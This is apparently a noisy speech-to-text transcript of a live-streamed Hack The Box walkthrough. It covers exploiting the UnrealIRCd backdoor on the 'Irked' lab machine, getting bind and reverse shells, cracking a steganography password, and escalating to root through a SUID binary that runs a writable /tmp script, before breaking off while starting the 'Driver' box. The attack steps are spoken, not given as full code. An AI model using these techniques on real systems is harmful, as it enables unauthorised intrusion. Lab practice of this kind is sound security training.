Hello, welcome to Cyber Mentoring Monday. Alright, we're going to spawn this machine. Going to hack the box. We're going to make a directory.
Thank you for following.
Was it Irked we got? So I need to sudo open VPN. I think it's lab underscore? Yeah. Oops. Okay. And we're going to go into Irked. We'll obviously add the address. So the reason I do this is DNS mask. I did explain this last stream. Okay, the box is booting. So, there we go. So this is my own DNS server that's running locally. It's better than DNS mask. It's better than adding something to Etsy hosts. The reason is if you add some to Etsy hosts, you only get... So say I added irked.htb to Etsy host, then I could do irked.hackthebox easily. That would work, but I can't do something like www. Right? But using DNS mask, I can. Which is why it's just better. So we have irked. We're going to use AutoRecon, obviously. Config.toml irked.hackthebox. So AutoRecon is obviously my tool. I can put a link in chat, AutoRecon. Feature request to improve. What, Zap? Honestly, I think the main issue with Zap is the user interface is just awful. Like, they just need somebody to design a user interface. It's almost too complicated. I mean, don't get me wrong. Burp's user interface is bland, but it's easy. Everything is a tab. But honestly, that's fine. You don't need anything else really. It's just very easy. If I want to get to proxy, it's there, you know? Okay. It's found IRC. So I imagine there's going to be an IRC exploit here. It's also found SSH, HTTP, RPC bind. Okay. I mean, let's check out the HTTP server firstly. And what we'll do IRC is almost working. Okay. I'm going to go into VS Code, go into the HackTheBox directory, go down to Irked. IRC Internet Relay Chat. Very old chat. Actually, I think it's... You're using IRC now, apparently. I was looking into building a Twitch chat bot. I believe the Twitch chat is a very basic IRC interface. To be honest with you, most chats are based off IRC. I'm pretty sure Discord and Slack are both based off IRC. It's just reliable. It's really reliable. And very simple, and you can just build on top of it. Okay, so what we got here? Let's check out the mmap scan for this and see if there's a /manual, which I'm guessing is just going to be the Apache manual. This is Apache. So let's actually just go and see. Yeah. Okay. Ferox Buster trying to find stuff. So we're going to try and find 200s. Obviously there's an irked.jpg, which we don't really need. I'm hoping there's nothing in there. Let's check out the SSH and map. And the only reason we do this is to see if we can log in using public key and password, which we can. We have NFS, apparently. No, we don't. Okay, so it falsely thought it was NFS, but it is RPC. However, nothing really useful there. Okay, fine. So is this IRC? This is IRC. Reconnecting to... Oh, crap. Well, at least we have an email address. So we may... Because we mapped this, we may actually have to restart the box at some point. But it is Unreal IRC, so let's make a note of that on 6697. What's 6697 is IRC. Okay. Apparently so is this port, 8067. Okay, nothing there. And so is this port. Oops. Okay. I don't know if we're going to have to restart the box. Because do we have an IRC client on here? Linux IRC client. Why would it matter? Because it, well, I mean, this message, we go back to this message here. Closing link, reconnecting too fast. So I don't know if it may have banned us. IRRS, yeah, I used to use that back in the day. If I remember, it's really not good. Is Pigin installed? No, but we can probably install it. Okay. We're gonna use Pigeon or Pigin, however they want to say it. I don't want to have to mess around with a console client. It's just going to be very annoying. Okay. There we go. We're going to add IRC. The server is going to be irked.box. Let's call ourselves Tiberius.
Dispensing gratitude.
It was port
dispensed.
6667. I don't think it was, but it's 6697. So we do have to change this. Okay. Yeah. Add. No password needed. Okay. Can we just connect to this now? Oh, are we actually connected already? Connecting. Okay. Available. So I believe we are connected. So now we should, I believe. We can't do a room list. Okay. Can we just do... And I actually have to learn how to use Pigin again. Hmm. There should be a way to just interact with the server itself. Yeah, the problem with /help is there's no way to type /help. Or maybe... Maybe this was the worst thing ever. Let's just do test, I guess. /help. Okay, there we go. So we can just use this. Alright, so what do we got? Version. Or help version, maybe. Send CCTP version. This actually may be the version that they're running. User's not logged in. Well, we did find that username. So let's try interacting with this guy. So new instant message to him. And then help the version again. It's been such a long time since I've done this. User's not logged in. Alright. Is it just /version? I don't... No, it doesn't seem to have done anything. Let's use search exploit. Okay, I mean, this looks like it might be the thing. But I want to try and actually find the version of Unreal that it is. What happens if we just try connecting Irked.HackTheBox using 6697, I think it was? Notice off, looking at your host name. Tell you what we'll do. Hactrix IRC. Okay. So we could try and rerun this script, but obviously maybe with just these, not the botnet channels, but this. So we're going to rerun a map. Actually, you know what? Let's just do this first. 6697 Irked.HackTheBox. I should probably do a dash PN to disable pinging. Okay, so it did work. And so what we need to do now, test for the backdoor. I don't know what this is going to do. Bad Moles resubscribed. Thank you so much. Did they give me an alert? I don't remember hearing it, but we will add you. Bad Moles 7. Looks like a Trojan version. Okay. I really want to try and find out how we can look up the version. But I'm guessing what we can just do is this thing. So if we just use NC again. Can I just change it? Now let's just do version. Okay. There we go. Couldn't resolve your hostname using... Okay, so maybe this didn't even need to happen. fact, let's just do that again. Let's just see if waiting gives us anything. So it looks like it's running 3281. And that is indeed the version with the backdoor. So let's actually try search exploit -m for mirror 13853. Alright, let's see this Perl script. Oops, 13838, sorry. Alright, what's this doing? Perl reverse shell. Basically, we can execute. It just looks like we can execute code. Okay, so what do we do here? Let's have a look. So host, port, and type. Type being what? Okay, type being one of these numbers. Opens the socket. Well, this is connecting to the IRC server. Okay, I'm trying to do this manually, right? It looks like, for instance, we could just run one of these shells. So where's payload 4? Print socd payload 4, which I'm guessing just sends. Yeah, I'm guessing if you print to a socket in Perl and give it something, it'll just send it. Maybe. So I wonder if we can just do that. So basically AB and then whatever command we want. Okay, I think we need to do pong. ID maybe? Maybe. Well, let's try curling something. So we're going to do Python-m HTTP server. Let's just do curl HTTP 10.10.14.124 8000. Unknown command. Do we just need an actual command? Is that how we do it? So maybe help? No. I'm just trying to figure out. It just looks like it's sending. I'm just going to try this again. Hang on. Yeah, I know the big downloader. The problem is we don't. HackTheBox doesn't have the ability to reach those. Is it port 8000? It is. It could be wget. It could be that the curl isn't installed. So let's just try this. I'll tell you what we're going to do. Copy this. We're going to cancel this. Reconnect. Interesting. I mean, what we could do is just modify one of these payloads. So why don't we comment out this one? payload 1 equals AB wget HTB 10 10 14 124 8000. Oh, it needs an and at the end, maybe. No, that's running in the background. Screw it, let's just do this. Alright, so. Well, HackTheBox 6697 and 1. Compilation errors. I messed up somewhere. Where did I edit it? Oh, I need a semicolon at the end. Typo. Payload sent. We didn't get anything. Should we try just very simple, maybe? Oh, you mean this semicolon? Yeah, maybe. Tell you what I'm going to do. I'm going to cancel this. And we're going to start one up here. Let's just try netcat. Oops. Maybe just ping? Ping-C4. Obviously we need to do a TCP
Thank
dump.
you for following.
Thank you, non-Euclidean. Oh, Euclidean. Non-Euclidean. Right. It takes me a minute, but I do get there. TCP dump. So do TCP dump. And you do just ICMP. There's got to be a. Thank you. Assuming that's right. -I ton 0 ICMP. Okay. So we're gonna ping 10 10 14 124. No. So maybe this Perl script just doesn't work. Should we just try? We could actually use exploit DB and what was the search exploit command I used? Unreal. Here we go. We'll have a look at how it does it in the actual exploit. Oh.
Thank you for following.
Plus a forward slash? Oh, not forward slash. Plus a new line? I kind of do want to find out what we're doing wrong here, but thank you, Ainwix. Unreal. Oops. Here we go. Show options. Alright. Set our hosts to Irked.HackTheBox. Set our port to 6697. Show payloads.
Thank you for following.
Thank you, Holland75. Let's set the payload. Oops. Set command 2. Alright, we'll just do the ping command again. Ping-C4 10 10 14 124. There we go. Alright, so it works, but let's try and figure out why. Payload encoded. This is the weirdest thing. I imagine it's just going to be bytes. Can we maybe do this in Python? I kind of want to try this in Python. So I want to also see, is VSCTF the one? Okay, I think I'm just going to copy this. Hopefully... No, that's not the right one. Okay. Grep.
Incoming raid.
Thank you, XX Vorny XX, for the raid.
Thank you for following.
Okay. And thank you for following as well. Oh boy. Okay. There's a really useful way of coding in sockets in Asyncio, and I just want to see if I have payload right. I mean, we can just look it up, I guess, but it's just really kind of useful. Asyncio demos, maybe? Maybe that would be it. Yes, perfect. Okay. I'm going to copy Asyncio demos echo server to exploit.py.
New subscription received.
Bad
Dispensing
moles.
gratitude. Gratitude dispensed.
Thank you so much for the 5 gifted subs. That's an extra 5 spins to you. Okay, so let's code this. I want to... Where are we? Irked. Okay, so I just need to... Oh, actually, this isn't... Right. I'm just going to have to look up the Python Asyncio socket library. Open connection, that's the one. All right. So, honestly, we don't need any of this now. Okay, reader writer, we're going to open a connection to Irked. HackTheBox on the port 6697. We are then... Okay, yeah, I'm just gonna copy this. Copy this code and we'll use it as we need to. Okay, so we're gonna do... Thank you, 4 ores for the Prime sub. for ors. We're asyncio because honestly, I hate programming in sockets in Python. I would get these random stupid disconnects all the freaking time. Asyncio is just made it amazing. So what we're going to do, let's just comment out all of this crap. Do we even need the close method? I think closes the stream. Okay, yeah, so we do need this. Whoops, where am I? No, actually, hang on. The stream being... No, okay. What am I talking about? We don't need this at all. This is all good. So, I just want to see what happens if we run this. Python exploit.py. There we go. Perfect. Okay, so, based on this Perl thing, all I think we need to do is just send this. But obviously, we need to send it as bytes, which means we need to use this writer. So, if we just do writer dot write, and then we put our message in, and then we do dot encode, and then we do await writer dot drain, and then I'm just going to do asyncio dot sleep 20. We need to await that. All right. Destroy that one. Okay. TCP dump again. Okay, and exploit this. So if this works, hopefully. I mean, I don't see why this wouldn't work. It's the same code that we sent here. It did work. Perfect. We just have to wait a bit. So I don't know why the Perl script isn't working, but the Python script does. Which programming language do I learn first? PHP, unfortunately. Okay, so let's try wget then. Actually, let's try curl first. Do this. Why it takes so long? I have no idea how this works. Python -m HTB server running on port 8000, so I do need to update that. Oh, maybe it couldn't reach me on port 8000, so let's actually just leave that. That was one thing I didn't. All right, I'm gonna do a tail for my Apache server. So let's see if this works now. Java was the second language I learned. And honestly, if you learn Java's fine. Java gets a bad rap because of applets. It's actually a pretty decent language. Alright, so that didn't work. The sleep 20 shouldn't be doing anything. Because await writer. Basically, what happens with asyncio and streams is you get a reader and a writer object. Did I launch my Apache server? Good question. I think I did. Localhost. Actually, I should put you 10.10.14.124. I did. Where am I? So, when you open a connection using async.io, you get a reader and a writer object. The reader object basically just reads the first whatever, how many bytes you want. Actually, I'm going to change this to read line, which is a really nice. There we go. Read line. And then it just write. So the writer writes whatever you want. Obviously, we need to encode it to bytes because it accepts bytes. And then this waiter.drain waits until all the bytes have been sent. But I guess if you want, we can take this out and see what happens if we just send it and forget about it. So I'm going to use the ping again. Ping 4. It's possible it's just a port thing though. So we're going to use TCP dump again. And we're going to use Python. So all this did was it sent the payload and then exited. If the payload still gets executed, now remember it took like 20 seconds to execute that first time. But I imagine we have to hold the connection open. Oh, I didn't start Stream Raiders. Let's start Stream Raiders. I'm going to need a lot of people because this is a mystery level. So who knows? Yeah, this hasn't worked. We definitely need the sleep in there. And in fact, I'll just increase it to 60. What I could actually do is do another data read and see what happens. So Python again. So yeah, nothing came back. So it's trying to read a line right now, but it's not reading anything. Okay, there it got a line. Which meant that between us sending the payload and the next line, there was that massive wait. Thank you, DP Mendina, for following. But now we're not getting anything at all. This is a weird box. Did I mess up the command? No. Huh. Alright. Let me put this back to 20 and we don't care about this. See if we can get it to do it again. And if not, why? Why did it work one time and then it didn't? This is a weird box. That is the right IP address. Ping should be fine. Yeah, I don't really understand what's going on. So, assuming this doesn't come back, we'll try the Ruby again. It's possible it was a massive fluke that first time. It looks like it kind of was. Alright, so we're going to cancel this. Alright. Let's do this again. Exploit it and see. Again, this is the same ping command. That took a while just to even get a connection back. Well, that's weird. Yeah, okay. For some reason this is working and I don't know why. But whatever. Let's now try oops, tail. Let's try tailing this. Let me just make sure I can do it again. Curl. Lovely. Okay, so we're going to set the command to just do a curl. I'm just going to use exploit and exploit it. Alright, so that one connected pretty quick. But again, we're looking for a get request to / exploit if it does work. If curl doesn't work, we'll change it to wget. Wget doesn't work. We're going to have to try using some kind of script to see which ports are open or ports it can get to. Which is what it's looking like right now. So let's try wget first. Netstat? Well, it doesn't look like we can actually get the output of the command back. But I will teach you a trick. If this doesn't work and we have to figure out which port we can get to, I'll teach you a trick. It's not looking good. So, we're going to go to... go here to... reverse shells? Yeah, here we go. Alright, yeah, so that didn't work. So what I want to do is I'm going to go back to TCP dump because we know that the ping command works. So what I want to do here is try running the ping command via bash and see if that still works. So basically I've set the command to bash-c and then the ping command, the same ping command within quotes. If this still works, it means we can pass commands to bash. Where did I get your ASCII? I'm pretty sure I just Googled for it. Okay, good. So we can pass commands to bash. So what we can do is we can select this. Or honestly, this one might be easier, but I'm going to try this one first. Assuming there's no line limit length, there might be. But you know what? We're just going to try the first. Let's just go up to here. Okay, now I want 1010. 10, 10, 14, 124. 124. Okay. So. We'll set the command line to bash. All that goes in there. You know, actually, I'm going to reverse the polarity of the quotes. We're going to use single quotes for this and double quotes for this. So I'm just going to show options and make sure that actually worked. Yes. All right. So now what we want to do, I want to use TCP dump just to look for SYN packets. And you capture SYN packets. Okay. Is this? All right. So we need this. Do I put this in quotes? Yes. I don't want axe. I just want TCP SYNs. Let me just double check by doing a curl to myself. That did not work. Maybe it just didn't go out the... is it hello 0? IPA. It's just hello. Okay, curl. Localhost. Good, okay. So, we're going to reset this back to this. This will output whenever we get a SYN packet. Importantly, that means if we do get a SYN packet on one of these ports, right? I should also disable, I think it's -N, right? For... Hang on a minute. Because I just noticed it did HTTP, which means port 80, but I don't want that. Let's curl it and make sure it does port 80. Perfect. So we just need to do a -N. Okay, so it's basically this script is going to iterate through these ports, and then it's going to try wgetting on each of those ports. Now, it doesn't matter that most of these ports are closed, because even if the port's closed, it's going to send a SYN packet. And we'll see it here. And if we get a SYN packet, it means that it can reach us on one of these ports. So, let's try that. And immediately we get a SYN packet. No, sorry. These are outgoing SYN packets. Ignore these. So this is my IP address. Yeah, so this was us sending a packet. And that was us again sending a packet, I believe. No, that was the packet getting sent back. Okay, no problem. So, hopefully. Now, the only reason this wouldn't work is if wget isn't installed. If wget is not installed, we're going to have to try curl or possibly netcat. All right, so that didn't work. So I need to convert this to a netcat command. Oh, sorry, a curl command. So let me just do. So I think it's dash. Oops, dash O. The output, is it? No. Dash O. It is dash. Okay. So dash O remains the same. That just writes it to dev null. This is an easy box, but I mean, to be honest, I think all we just need to do is find the correct port. Obviously, if none of this works, we can try and just write a bind shell, I guess. But I'd prefer a reverse shell. Okay, now we need to do timeout. Max time, is that good? come on. Connect timeout. Yeah, okay. Connect timeout or max time. Right, we'll do max time. 1 second. And we'll do retries 0, I think. Retry num. Setting to 0 makes, yeah, okay, so -- retry 0. Okay. So again, that was just us. So I'll actually... And again, I think if this doesn't work, we possibly just have to try a bind shell, I guess. Or we just haven't hit the right port, but all the popular ports are in there. If you're sending a SYN packet, are you not expecting to receive a SYNAC? Yeah, I mean, this was the SYNAC, I think. The point is, that it's not us sending the SYN packet. It's we just care if the SYN packet hits our interface, but it didn't. Okay. What am I doing? We could use one Metasploit. I mean, I kind of don't want to. I guess we should at least see if it works. Show payloads. So we'll use a bind shell. So we'll set the payload to this. Show options. And the... Yeah, I guess 4444 is fine. Exploit. It'd be kind of annoying if that was the case. I didn't see anything else that would indicate. I guess technically we didn't check any of the other Barracks Buster stuff, but there wasn't anything there. Oh my goodness, there we go. So I'm guessing every single port is blocked.
We are in.
So we could ping, but we can't get out. Yeah, we can it's Python 3 it. -C import pty. Actually, can you control Z this from Metasploit? Or can I just NC to it myself now? Like if I do NC... No. I guess we can try this. Oh, I don't even need to really stabilize my shell as long as I get a nice terminal here. Okay. Oh, we don't have a thing. Do we have curl? We don't have curl. Do we have wget? We do have wget. What? How? Did I need the whole... Alright, I'm annoyed now. Let's... Why did our thing not work? I mean, we could have just used bash, right? Bash, dash C, wget, HTB. So, tail. Yeah, I mean, that was wget there. So, Python exploit. So, I mean, the thing is, it's possible there's something completely janky about my Python exploit because it did work that one time and then never worked again. So I don't really understand what's going on. It doesn't seem like it's working now either. That's confusing because pretty much exactly the same thing as what we did before. Okay. Well, we can grab a stabilized shell using rev shell gen here. So I need to do 10, 14, 1, 2, 4, bash, L1 URL. Oh no, that's all. What? Oh, I just need a port. There we go. So potentially we just do this. I'm going to background the whole thing. There we go. Alright, I don't know why. I didn't really want to use Metasploit because I don't think that really teaches anything. And it worked that first time. Everyone saw it. This script worked. I don't know why it didn't work ever again, even if we reran the same commands. But hey, we have a shell. Bin bash. At least now we can background the thing. Don't know why that's not working. Okay. Why did that not work? Can I do ID? It's just dying immediately. Alright. Never mind. Actually, you know what? I do care. I'm gonna do rev shell gen and see. I'm just gonna try this. Okay, there we go. That worked for some reason. Import pty, pty, dot spawn, bin bash. Control Z this. All right. STTY size and STTY raw dash echo. STTY rows 39. And STTY cols 172 and export term equals xterm 256 color. Yeah, I don't know why that was going on, but what I basically just did is I stabilized my shell. It means I should be able to do Control C and it won't just kill my shell, which is nice. So in our home directory, We don't have a flag. Is there somebody else? Yeah, okay, so we probably just need to get to DJ. DJ Mardot. And there's the user.txt, which we probably cannot count. No. Alright, let's do a sudo-l. Sudo's not found. Interesting. Let's look for some SUIDs. We're just going to do some quick. SUID command right there. To help if it actually copied. Come on. Okay. Well, there's a few things here that are interesting, I guess. There's XIM, which is always fun. X, I'm imagining, is going to be X11? Maybe? View user. What the hell is view user? Is that like a custom thing? I'm just going to... Actually, GTFO bins. View user isn't anything. X? No. XIM is something we could probably use. Procmail. Let's just try. Let's just do --help. XIM is a XIM --version. Is it compiled with Perl? We can just use this and then go to search exploit. XIM. This thing. PK exec? Not usually. You have to use the password. Search exploit -m39549. Alright, here we go. Right, so you need to do this to check if it works. Basically, we're grepping for Perl. Grep I? I think it's -I it needs, actually. XIM command not found, right? So we do need to use the whole thing. Oh wait a minute, does that just mean my path is rubbish? User bin sudo. Alright, there is no sudo. So what we want to do, XIM4, and then basically there's just the rest of this. Alright, it's not going to work. So this exploit requires it to be compiled with these Perl stuff, so obviously this is not going to work. Alright, well let's just see, was there anything else in this home directory that's interesting? Anything readable? So, try and downloads. Oh, should probably do ls-la and desktop. Documents, all the Ds. Well, you got this. No, SSH directory is only executable by this user, so we can't even get into it. But documents does have something. We probably can't do this because of the permission. Yeah, so this, even though we have... So whenever you see a link, this is basically a linked file, it's pointing at this. So there is a user.txt link file in the documents directory that points to this. However, the permissions look amazing, right? Read, write, execute. Just ignore those. If it's a link file, those are irrelevant. All the permissions that work that matter are on this file in terms of reading. But we can... I mean, there's a backup file. We can't get into it, though. Oh, no, sorry. We can read it. Backup. Okay. So there's a backup password. Is this just his password? Or is there a user? Okay, DJ Mardov. Is that his password or not? No. Super Elite Steg backup password. It said, oh my goodness. So it's going to be... It's going to be this damn thing, isn't it? Oh. Why do they do this to us, chat? Yeah, Konami code. So what we'll do, we'll download it, then we'll do Stream Raiders. Alright, so we can just close out of this. So we got Steg Seek, isn't it? I think. This, I don't know why people do this. If you're going to have a -- help.
Thank you for following.
Thank you, Getoxic, for following. If you're going to have a -- help, you better do a -h. Alright, so we do need... to crack a Steg. So can I can just give this a word list, right? So pass, and this password. Steg seek. And then we need the file, which is irked.jpg, and then pass. There we go. Irked.jpg.out. Okay. So now can we... I mean, we can probably use SSH at this point. SSH D Markov? DJ Mardov. Okay. Is it going to actually let me connect? No, I mean -h and -- help. You should at least have both of those. I just don't understand why people would do -- help instead of -h. Do both. There we go. Alright, that was his password. So...
I'm in.
Haven't really been doing this, but... Backdoor after you use Metasploit. And then home DJ Mardov /documents/.backup. Add the password. Which is this. So Stego. Oh, I should probably actually include the whole Super Elite Stego backup password. No wonder this. Why was this even allowed? This must be a really old box. Stego in image on index.html. Contains. Contains this. I should say contains DJ Markovs. Mardov. Why am I saying Markov? There we go. Alright, so now we do have a SSH session of that. So we can do the cat user. Oops. And solve this at least. I'm going to mute. Alright, I mean that was... Yeah, it was easy, but we just got caught up on exploits not working. Which note app am I using? It is not Obsidian. It's Notion, but it's Notion Enhanced for Linux. All right, so we did get a flag. Okay, right. Now let's do sudo. Yeah, I don't know why. Okay. Oh yeah, because sudo's not on the freaking box. All right. There is that Mozilla directory. Which we can crack usually. Tools. Firefox decrypt. Yeah. So what I'm going to do... cd into HackTheBox Irked. We're going to do an SS. We're not going to do SSH. We're going to do SCP -r .mozilla into Mozilla. Should work. It's a very slow box. I think you did not place your unit. Oh, that's correct. There we go. I've placed it. Okay, so basically downloading here's Firefox. Now if I use Python, Firefox decrypt. Alright, I think we can just use list, right? List, and then we need to pass it the path to the profile folder. So this, in this case, is going to be Mozilla Firefox. Okay, good. Now we can just do... How do we decrypt? Oh, the choice to use. If there's only one profile, it defaults to that. Oh, okay, well there we go then. Just need this. Couldn't find credentials file. Fair enough. I guess we'll just try it anyway. Unrecognized arguments, Mozilla Firefox. What? Oh, it's no interactive in -C. Yeah. All right, so that was worth trying. Look in the .ssh. Nothing in there. Alright, var maybe? Index.old. It looks like it's just the regular... I don't know, why did they not just delete this? Okay. HTML maybe? No. Alright. Let's see if there's anything in opt. We do -LA. No. Okay. At this point, I'll probably just wget linpiece, since we now have a very stable shell and we can run it. Chmod plus x linpiece / linpiece -q t linpiece.t. Okay, so please don't be a kernel exploit. I hate kernel exploits. Any questions about what we've done so far, by the way? Okay, what are we doing? Okay, so found everything. Yeah, so Dirty Cow is possible, but again, I don't know how old is this box. Okay, this box is like over 4 years. Is that? Yeah, I think so. So the rule in this stream, by the way, so we don't waste time, is if we do come down to a kernel exploit or something ridiculous, generally what happens is I ask somebody to just look up the walkthrough. And that's so we don't waste time. Yeah, so why don't I like kernel exploits? Because they're so annoying. Half the time they just don't work. Most of the time you need such a freaking specific version of the exploit. And with Dirty Cow, there's like 500 of them. So, to save time, if we suspect it is a kernel exploit, we just ask somebody to go and double check. Because honestly, there's no point in wasting an hour trying to get a kernel exploit to work when it's not a kernel exploit. What's that exploit X suggestion? We can try it. It is 4 years old, which is, I think, when the box was created, but... It is indeed. So that might be it. So I guess what I should do, was it just X? What we'll do is we'll do user bin X -- help -H just to be sure. It is the X server. Okay. Well, this might be it. So what does this do? But it says it's Xorg that is the... No. There is an Xorg binary. Okay, fair enough. What does this do? I'm just trying to figure out what this does. I guess we could try doing the version check on this user bin xorg -- help -H. Okay. Does it have version? Maybe correct version. We need to redirect. No, this one. Yeah, it's just version. All right, Xorg server 1164. No. So this suggests it's between 119 and 120. This is Irked, yeah. So I don't think this is correct. It is saying no. I think it's talking about the Xorg binary. Maybe this isn't. Let me just do a double check. Yeah, this isn't. So what it says here is that Xorg is shipped setuid. And they're running Xorg. They're not running X. But I guess we could try... Which X? User bin X -- help -h. Is it just dash version still? Yeah, it's still 116. Yeah, I don't think this is it. I mean, maybe. Oops. Overwrite any file. I mean, we could try it. So it looks like we're overwriting. So what is this doing? Log file shadow? Master password? I mean, okay, I guess we could try this. I don't know. I'm not actually. I'm going to check the rest of the... We may come back to that. I'm just not sure. It looks like a very strange exploit. Okay, so anyway... We'll see if there's anything worth looking at, because we've probably missed something. SUIDs, yeah, I mean, there were a few, but none that seemed interesting. I just want to do this properly. Got some system timers, nothing there. I'd rather be 100% sure about something. It is weird that there is an X server installed on this machine. Let's just put it that way. Okay, blah, blah, blah. Private SSH keys? I'm sure they were. Okay, what have we got here? Why did it scroll all the way down? I hate that. Okay. I don't know why it did this, but going back up. Unexpected en route. There we go. Irrelevant, we can't even read it. Okay. I'm scrolling back up because I'm pretty sure... Oh, okay, we definitely passed this bit. I'm just going to page down. This is probably a bit easier. Alright, yeah, so user bin X is SUID. Which user am I? I'm the DJ Mar something. Nothing there, nothing there. Oh, I didn't catch his... No, his bash history was... It was DevNode. Alright. Alright. Okay. Alright, so this is just going through, I think... Weird database. Yeah, it's just going through the DJ Mardov. Yeah, exactly. Okay. Alright. I mean, we can try this. So appears that we can just do this. Log file shadow. Oh, I see what it's doing. So let's do this. What we're going to do, we're just going to try writing something into our home directory, right? Which we're in. So, I mean, we'll just try this, right? So root into, I'm just going to call it test. Why did it? Okay. The test file was written as me. Okay, let's just try the X then. Because X was running... It was the SUID version. Oh, I should probably remove test. That didn't even do anything. Alright, yeah, I don't think it is that. What is this? It's going to be something really dumb. Have we tried reusing the... One thing I didn't even try was reusing the password for root. Okay, it wasn't that stupid. Again, bash history we can't read. Nothing in temp that we really care about. Unless there's something in Unreal, but there wouldn't be... Peace by? Yeah, it probably is time for that. Oh goody, yes, we're gonna definitely win it. Stream Raiders cannot execute us. This is, oh my goodness, is this a... Yeah, this is a... This is not a 64-bit system. Do I not? Oh, is it just piece by that? God, what did I call it? Oh, I just called it 32. Yeah, that would probably make sense. Okay, so now we can just do piece by 32. There we go. That works. All right, so hopefully this is going to tell us that root is running something stupid. I-86 is what they call 32-bit, and I don't know why. Well, we can find out together. Because 86_64 is 64-bit. That makes sense. Right? The 64. What is the meaning of I-686? Yeah, it doesn't tell you. P6. Okay. It's the Intel x86 microarchitecture. x86 is a... Oh, it's the instruction set. That makes more sense. So it's the 6th version of the x86. But x86 is 32-bit. Naming conventions back in... When was this? 1995. Alright, do we have anything here? We have this mod probe. But this seems to be executing every 10 seconds-ish. This is all me. Xorg is running. It's gonna be something dumb that I'm just missing, because a lot of people have solved it, which means it's definitely possible. It's not. What the hell is this? Can somebody go and check if it is just a kernel exploit very quickly? Is it just Dirty Cow? It's not. Well, no thinks that it was an SUID. I mean, that's fine. Just in future, don't tell me that. I asked a very specific question. Okay, Clay hacks, it's even worse. Okay, hang on. I want to solve the box. Okay. I asked very specific questions. The question I asked was, is it a kernel exploit? That is a yes or no question. It does not. The answer SUID or view user is not an answer to that question. Just to clarify things. Please, in future, don't do that. I mean, now we know it's that stupid view user thing. Oh boy. Well, let's find it again. Yeah, so it's this. Okay, so view user. Let's run strings on it. Temp list users. Okay. Oh, hang on. Where are we? So it looks like it just runs temp list users. I'm guessing, which like doesn't even exist. So is Vim installed? Please be installed. No. Okay. Bin bash. Can we just do bash? Dash I. Is that something we can do? Dash P dash I maybe? Oh, we'll try that. Chmod plus X list users. Yeah. That was it. Okay, so let's just pretend that after searching this box up and down, I finally remembered that there was this view user binary. I then ran strings on this binary, so that you don't just run random binaries. Run strings on it, see what happens. There are a few good things in strings. So setuid basically usually is used to set the UID of the process to 0. Obviously, the SUID stuff kind of does that. Put S is usually just printing things. System will run commands in a shell, effectively. It's not going to tell you which command it's running here, but if you scroll down, so this stuff is being fed to put S, put string, right? That's just going to echo it. But then this thing is a file, which is probably what system is running. And it says it's still being actively developed, and when we double check, there wasn't anything there. So I just created a bash script. Now, importantly, you need to actually start it with this, so it runs as a bash script. And then I just do bash-p-i just to spawn bash. Yeah, I'm glad I remembered about that binary as well. All right, so now we're root. Why is there... What's in past up? Oh, it was the backup. All right, yeah, yeah. Oh, we didn't do the We're
We are
in.
in.
All right, submit flag. Yeah, that was pretty easy. It's just any questions about that? Does the box have L trace? It might do, but you don't need it. Trace is probably not on here either. No. Most of the time you can get away with strings. How do you find view user? That's a good question. We ran this command, which finds SUIDs, right? And then here it was. All right, driver. Thursday is Thanksgiving in the US, so I may be stuffed full of turkey. Also, the Patriots are playing the Vikings. They wouldn't need to spend money on extra clocks. The only person who needs the clock is the referee. Alright. Oh, hang on. Oh, what am I doing? Driver.hackbox. There we go. Alright, so we're going to use auto recon again. Honestly, I feel like they should just... They should just do stop the clock whenever there's some kind of injury or penalty or whatever. Offside penalties never made sense to me in soccer. It seems dumb. Not really, because honestly, if offside penalties were allowed, or if being offside was allowed, you could just have your best player, like your best goal scorer, stand next to the goalie. And then anytime you get the ball, just just kick it downfield and hope that he gets there before the goalie. Like, why would you not do that? All right. What have we got here? Well, we have port 80. 5985 is going to be what's it called again? That WS man, that's it. But we'll check out port 80 first. Oh, okay. Interesting. So this site is protected by... Where is it? It's protected by basic authentication. MFP firmware update center. Please enter password for admin. Well, let's Google that. Admin password. Default login password. Init pass or access, maybe? Okay, let's try it. Init pass. Okay. Access? No. Well, there's an exploit for it, apparently. Arbitrary file upload. Okay, so we basically need to find out what the password is first, I imagine. Yeah, default password. Password 9999. There we go. That looks like it worked. I said that too soon. How many nines was it? 6. Okay. Default admin. Alright, we can just try a bunch of them. It was admin. Alright. So let's see what this... The printer firmware update script. I mean... That doesn't really tell me anything about it. So I'm just going to go to... Oh, we're going to go to exploit.db and just search again for MFP firmware. MFP. I mean, this might be how we privilege escalate. Alright, MFP firmware exploit. Possible to load malicious DLLs. Okay. This was... What was it? Firmware updates. Okay, that doesn't work. So, design jet. HP design jet and eco tank. I'm guessing HP eco tank. Yeah. Okay, this is an HP. So we need to do HP firmware exploit. Oops. Check out the article concerning... Yeah, it's ridiculous. Okay, what was... So there was an HP thing here. Can be downloaded. Alright, where's HP?
Thank
Maybe
you for
Metasploit?
following.
Thanks over DDS. I don't know if this is anything either. No, that can't be it. We should probably actually have a look at other things that are going on in this box. Driver. Okay, so obviously none of this probably so because this required a password, all this is just going to fail. Let's see what we have. It's 64-bit. That's obviously useful if we're going to do firmware updates. I mean, this is just... Was there anything on... this? No. And then obviously WinRM. So SMB client, for instance, whoops. Driver.HackTheBox. Access denied. No software. Watch this. This one is VS Code, except it's the open source version of VS Code, which is called Code OSS. This one is Notion enhanced for Linux. Okay, so this is... I basically need to compile some kind of version of HP firmware, RCE, I guess. Oh shit. Okay. Firmware. Okay, here we go. So maybe... Oh, we just have to scroll down, I guess. Default settings, extraction of the OS. Okay, this looks like it's something completely unrelated, but... Huh. Wrote a custom tool. Okay, this allows modification of the original BDL by replacing the zip file. Alright. So maybe this will work? This already doesn't seem like an easy box. Oh god. Gaining arbitrary code execution. Okay, so this is H-Pone. When is this box released? Okay. I mean, it's got to be something simple. Oh, hang on. Testing to review. Oh, I missed that. Can I just do a test PNG? Or I'm just going to upload Irked. Okay. What did that do? Okay. We should probably Okay, what I'm going to do, we're going to rerun Ferox Buster. We're going to give it the... can I just pass it username and password here, or do I just have to give it the header? Probably just have to give it the header. Alright. Oops. So we're going to do Ferox Buster. Adding a header is what? -H. Should be fine. We're going to do 20 threads. We are going to use -W word list Buster. For extensions, it's PHP. We'll do TXT, HTML, and PHP. And then I guess just -U. Oh, we don't want recursive. Driver.HackTheBox. Yeah. Okay. Let's try that. Images. So images might be what we uploaded then, given that they're firmware images. Did you do flight on HackTheBox? Can't remember it, but what was the file I uploaded called? Irked.jpg. Couldn't find that. This box almost feels like it's it feels like it's some kind of firmware box. But at the same time, it's supposed to be easy. So I guess we just keep scanning this thing. I honestly don't know what else to do at this point. Because... yeah, but it's also an easy that over 